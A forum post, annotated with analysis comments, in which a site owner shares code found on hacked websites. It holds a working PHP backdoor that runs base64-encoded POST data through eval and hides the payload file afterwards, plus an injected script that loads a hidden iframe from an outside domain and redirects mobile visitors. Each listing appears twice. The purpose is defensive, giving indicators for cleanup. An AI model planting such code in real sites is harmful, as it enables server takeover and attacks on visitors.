Anyone got experience of malicious scripts?
Discussion
I have a couple of websites out there, and a couple of them have been hacked and are sending out millions of spam email messages. I found two PHP files that seemed to be the 'engines' of the hack, but have also found some dubious-looking code in some other files. Extract below. Seems very dodgy to me:
// Analysis note: this extract is a remote-code-execution backdoor stub.
// It reads the POST field "gjwqweodsa", base64-decodes it and runs the result as PHP.
// No authentication or origin check is visible in this extract, so anyone who can
// reach the file over HTTP can run code with the web server's privileges.
// Indicators visible here: the POST field name "gjwqweodsa", the temporary file name
// "dsadasdsa1fag1.php" and the output string "ERROR! CANT DO NOTHING!".
// Removing this snippet alone does not close whatever let it be written; the post
// reports further dropped files on the same sites.
// $version is assigned but not read anywhere in this extract.
$version = "1.5";
// Only acts when the POST field is present and non-empty; the three tests overlap.
if(!empty($_POST["gjwqweodsa"]) and strlen($_POST["gjwqweodsa"]) > 0 and isset($_POST["gjwqweodsa"])){
// Probe: eval a harmless assignment and check whether the flag flips.
// Presumably this detects hosts where eval is blocked by a hardening extension
// (assumption, not shown in the extract).
$isevalfunctionavailable = false;
$evalcheck = "\$isevalfunctionavailable = true;";
// "@" silences PHP error reporting for the call.
@eval($evalcheck);
if ($isevalfunctionavailable === true) {
// The fragments concatenate to "base64_decode"; splitting the name keeps a
// plain-text search for that function name from matching this file.
$fnsdht = "b".""."as"."e"."".""."6"."4"."_"."de".""."c"."o".""."d"."e";
// Variable-function call: decode the request-supplied value ...
$fv = $fnsdht($_POST["gjwqweodsa"]);
// ... and execute it. In this branch the payload is never written to disk, so the
// commands would only be visible in captured request bodies, not on the file system.
@eval($fv);
// Commented-out variant that evaluated the raw POST value without decoding.
//@eval($_POST["gjwqweodsa"]);
}else{
// Fallback when the eval probe fails. realpath("") resolves to the current
// working directory.
$mpath = realpath("")."/";
// Commented-out line left as found in the extract.
//$dop = "\n@unlink(\"".$mpath."dsadasdsa1fag1.php\");\n";
// Write the decoded payload into a PHP file in that directory, include it so it
// runs, then delete it. The file exists only while the request is handled, so a
// later file-system scan will normally not find it.
if(@file_put_contents($mpath."dsadasdsa1fag1.php","<?php\n".$fnsdht($_POST["gjwqweodsa"])."\n?>")){
@include_once($mpath."dsadasdsa1fag1.php");
@unlink($mpath."dsadasdsa1fag1.php");
}else{
// Reached when the temporary file could not be written.
echo "ERROR! CANT DO NOTHING!";
}
}
}
// Analysis note: this listing repeats the extract above it on the page verbatim.
// It is a backdoor that executes PHP supplied in the POST field "gjwqweodsa";
// no authentication check is visible. Useful search strings when sweeping other
// files: "gjwqweodsa", "dsadasdsa1fag1.php", "ERROR! CANT DO NOTHING!".
$version = "1.5";
// Guard: the POST field must be present and non-empty.
if(!empty($_POST["gjwqweodsa"]) and strlen($_POST["gjwqweodsa"]) > 0 and isset($_POST["gjwqweodsa"])){
// Self-test: does eval() actually run on this host?
$isevalfunctionavailable = false;
$evalcheck = "\$isevalfunctionavailable = true;";
@eval($evalcheck);
if ($isevalfunctionavailable === true) {
// String pieces spell "base64_decode"; the name is assembled at runtime so it
// does not appear literally in the file.
$fnsdht = "b".""."as"."e"."".""."6"."4"."_"."de".""."c"."o".""."d"."e";
// Decode the request value and run it as PHP, with errors suppressed by "@".
$fv = $fnsdht($_POST["gjwqweodsa"]);
@eval($fv);
//@eval($_POST["gjwqweodsa"]);
}else{
// eval unavailable: use a short-lived file in the current working directory.
$mpath = realpath("")."/";
//$dop = "\n@unlink(\"".$mpath."dsadasdsa1fag1.php\");\n";
// Write payload -> include (executes it) -> unlink (removes the evidence).
if(@file_put_contents($mpath."dsadasdsa1fag1.php","<?php\n".$fnsdht($_POST["gjwqweodsa"])."\n?>")){
@include_once($mpath."dsadasdsa1fag1.php");
@unlink($mpath."dsadasdsa1fag1.php");
}else{
// The write failed; this message is the only output the stub produces itself.
echo "ERROR! CANT DO NOTHING!";
}
}
}
I don't have the full logs, as it's third-party hosted, but I've also found this in index.php:
// Analysis note: this echo statement is an injected client-side redirector. The whole
// JavaScript body is a single PHP string literal that is sent to every visitor's browser.
// What the emitted script does, as visible in the string:
//  - sd5135GHEDF(url): unless an element with id "a35fdsfdsf62FFSSD" already exists,
//    creates a 10px x 10px borderless, absolutely positioned iframe (left set to "-200"),
//    appends it to the page body and points it at the given URL.
//  - asd61234tkhjasd454hfhf235(): calls that helper with
//    hxxp://novostivkontakte[.]ru/?id=ifrm.
//  - SFWR64362fdhHHHHH(): skips the iframe when the user agent matches a list of
//    crawler names (Googlebot, Slurp, msnbot, Baidu, ...), so search-engine fetches do
//    not see it; when the user agent matches a list of mobile device names, it also
//    redirects the whole page to hxxp://novostivkontakte[.]ru/?id=mob after one second.
//  - The last part hooks SFWR64362fdhHHHHH onto the window load event (attachEvent, or
//    window.onload while keeping any existing handler) and swallows any exception.
// Review implications: the page must be checked with an ordinary browser user agent,
// because the crawler exclusion hides the behaviour from bot-like fetches. The iframe id
// and the domain above are usable as search strings across the remaining site files.
echo "<script type=\"text/javascript\">
function sd5135GHEDF(agaga31323l) {
var melm = document.getElementById(\"a35fdsfdsf62FFSSD\");
if (typeof(melm) != \"undefined\" && melm!= null)
{}else{
var dsdSSSWrw515312FFF = document.createElement(\"iframe\");
dsdSSSWrw515312FFF.id = \"a35fdsfdsf62FFSSD\";
dsdSSSWrw515312FFF.style.width = \"10px\";
dsdSSSWrw515312FFF.style.height = \"10px\";
dsdSSSWrw515312FFF.style.border = \"0px\";
dsdSSSWrw515312FFF.frameBorder = \"0\";
dsdSSSWrw515312FFF.style.position = \"absolute\";
dsdSSSWrw515312FFF.style.left = \"-200\";
dsdSSSWrw515312FFF.setAttribute(\"frameBorder\", \"0\");
document.body.appendChild(dsdSSSWrw515312FFF);
dsdSSSWrw515312FFF.src = agaga31323l;
return true;
}
}
function asd61234tkhjasd454hfhf235(){
sd5135GHEDF(\"http://novostivkontakte.ru/?id=ifrm\");
}
function SFWR64362fdhHHHHH(){
if(navigator.userAgent.match(/(Googlebot|robot|Slurp|search.msn.com|nutch|simpy|bot|ASPSeek|crawler|msnbot|Libwww-perl|FAST|Baidu|googlebot|slurp|aspseek|libwww-perl|fast|baidu)/i)!==null){ }else{asd61234tkhjasd454hfhf235();}
if(navigator.userAgent.match(/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone|mobile|android|blackberry|brew|cldc|docomo|htc|j2me|micromax|lg|midp|mot|motorola|netfront|nokia|obigo|openweb|opera.mini|palm|psp|samsung|sanyo|sch|sonyericsson|symbian|symbos|teleca|up.browser|vodafone|wap|webos|windows.ce)/i)!==null){
try{setTimeout(function(){window.location=\"http://novostivkontakte.ru/?id=mob\";},1000);}
catch(err) {window.location=\"http://novostivkontakte.ru/?id=mob\";location.href=\"http://novostivkontakte.ru/?id=mob\";}
}
}
//setTimeout(function(){R();},1500);
try {
if(window.attachEvent) {
window.attachEvent(\"onload\", SFWR64362fdhHHHHH);
} else {
if(window.onload) {
var curronload = window.onload;
var newonload = function() {
curronload();
SFWR64362fdhHHHHH();
};
window.onload = newonload;
} else {
window.onload = SFWR64362fdhHHHHH;
}
}
} catch(err) {}
</script>";
// Analysis note: this listing repeats the index.php extract above it on the page verbatim.
// The echo sends one string literal of JavaScript to the browser. On page load that
// script loads hxxp://novostivkontakte[.]ru/?id=ifrm in a 10px borderless iframe
// (id "a35fdsfdsf62FFSSD") unless the user agent looks like a crawler, and redirects
// user agents that look like mobile devices to hxxp://novostivkontakte[.]ru/?id=mob
// after a one-second delay. All exceptions in the hook-up code are swallowed.
// The crawler exclusion means a bot-style fetch of the page will not show the injection.
echo "<script type=\"text/javascript\">
function sd5135GHEDF(agaga31323l) {
var melm = document.getElementById(\"a35fdsfdsf62FFSSD\");
if (typeof(melm) != \"undefined\" && melm!= null)
{}else{
var dsdSSSWrw515312FFF = document.createElement(\"iframe\");
dsdSSSWrw515312FFF.id = \"a35fdsfdsf62FFSSD\";
dsdSSSWrw515312FFF.style.width = \"10px\";
dsdSSSWrw515312FFF.style.height = \"10px\";
dsdSSSWrw515312FFF.style.border = \"0px\";
dsdSSSWrw515312FFF.frameBorder = \"0\";
dsdSSSWrw515312FFF.style.position = \"absolute\";
dsdSSSWrw515312FFF.style.left = \"-200\";
dsdSSSWrw515312FFF.setAttribute(\"frameBorder\", \"0\");
document.body.appendChild(dsdSSSWrw515312FFF);
dsdSSSWrw515312FFF.src = agaga31323l;
return true;
}
}
function asd61234tkhjasd454hfhf235(){
sd5135GHEDF(\"http://novostivkontakte.ru/?id=ifrm\");
}
function SFWR64362fdhHHHHH(){
if(navigator.userAgent.match(/(Googlebot|robot|Slurp|search.msn.com|nutch|simpy|bot|ASPSeek|crawler|msnbot|Libwww-perl|FAST|Baidu|googlebot|slurp|aspseek|libwww-perl|fast|baidu)/i)!==null){ }else{asd61234tkhjasd454hfhf235();}
if(navigator.userAgent.match(/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone|mobile|android|blackberry|brew|cldc|docomo|htc|j2me|micromax|lg|midp|mot|motorola|netfront|nokia|obigo|openweb|opera.mini|palm|psp|samsung|sanyo|sch|sonyericsson|symbian|symbos|teleca|up.browser|vodafone|wap|webos|windows.ce)/i)!==null){
try{setTimeout(function(){window.location=\"http://novostivkontakte.ru/?id=mob\";},1000);}
catch(err) {window.location=\"http://novostivkontakte.ru/?id=mob\";location.href=\"http://novostivkontakte.ru/?id=mob\";}
}
}
//setTimeout(function(){R();},1500);
try {
if(window.attachEvent) {
window.attachEvent(\"onload\", SFWR64362fdhHHHHH);
} else {
if(window.onload) {
var curronload = window.onload;
var newonload = function() {
curronload();
SFWR64362fdhHHHHH();
};
window.onload = newonload;
} else {
window.onload = SFWR64362fdhHHHHH;
}
}
} catch(err) {}
</script>";